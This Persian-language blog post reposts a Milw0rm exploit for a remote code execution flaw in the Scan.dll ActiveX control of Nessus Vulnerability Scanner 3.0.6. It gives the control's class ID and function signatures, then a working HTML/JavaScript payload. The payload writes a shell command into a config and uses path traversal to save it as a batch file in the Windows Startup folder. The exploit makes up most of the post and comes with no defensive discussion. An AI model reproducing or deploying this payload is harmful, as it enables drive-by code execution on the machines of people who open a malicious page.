وقتی خوشگل بابا گند میزند…

نوشته شده در ۲:۱۲ ب.ظ – 2:12 ب.ظ | توسط شهریار.ج | 44 views

درود
گفتم شاید واستون جالب باشه!

Nessus Vulnerability Scanner 3.0.6 ActiveX Remote Code Execution

در یک dll به نام Scan.dll آسیب پذیری مشاهده میشه!

Classid:A47D5315-321D-4DEE-9DB3-18438023193B

و در تابع addsetConfig میبینیم:

Function addsetConfig (
ByVal nessus_name As String ,
ByVal value As String ,
ByVal group As String
) As Integer

و همچنین در تابع saveNessusRC میبینیم:

Function saveNessusRC (
ByVal fullname As String
) As Integer

و حالا :


<-HTML>
<-object id="obj" classid="clsid:A47D5315-321D-4DEE-9DB3-18438023193B">
<-script language="javascript">
obj.addsetConfig(’shutdown -t 1000 -s -c “hello world ;]” && pause’, ”, ”);
obj.saveNessusRC(”../../../../../../Documents and Settings/All Users/Menu Start/Programy/Autostart/exec.bat”);
<-/script>
<-/HTML>

منبع اکسپلویت میلورم بود ! …
نظرات شما باعث شادی روح آن مرحوم و تسلی خاطر بازماندگان است.

مطالب مرتبط

کد مطالب مرتبط را در اینجا قرار دهید

ارسال دیدگاه

*
برای اینکه ثابت کنید شما یک ارسال کننده جفنگ (یک اسکریپت جفنگ نویس)
نیستید،کلمه امنیتی را که در تصویر نقش بسته است در فیلد پایین بنگارید .
قبل از ارسال به موارد زیر توجه کنید :
1- دعوت نامه پرشین گیگ نداریم.
2- از تبلیغ بپرهیزید.
3- کلمات نا مناسب و توهین آمیز به کار نبرید.
از دیدگاه شما متشکریم.

Click to hear an audio file of the anti-spam word

درباره من

در این وبلاگ ، جستار ها و دست نوشته های مرا در باره امنیت و ضد امنیت خواهید خواند.برای دسترسی به مقالات نوشته شده در وادی ضد امنیت و امنیت از دسته بندی {مقالات} استفاده کنید.


نامه برقي اينجانب
یافتن مطالب :